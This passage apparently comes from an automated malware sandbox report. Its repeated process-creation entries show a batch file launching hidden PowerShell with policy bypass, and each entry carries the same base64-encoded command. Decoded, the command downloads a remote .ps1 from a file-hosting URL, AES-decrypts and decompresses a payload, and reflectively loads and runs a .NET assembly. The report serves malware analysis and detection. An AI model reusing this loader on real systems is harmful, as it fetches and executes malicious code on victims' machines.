QkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat" "Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51b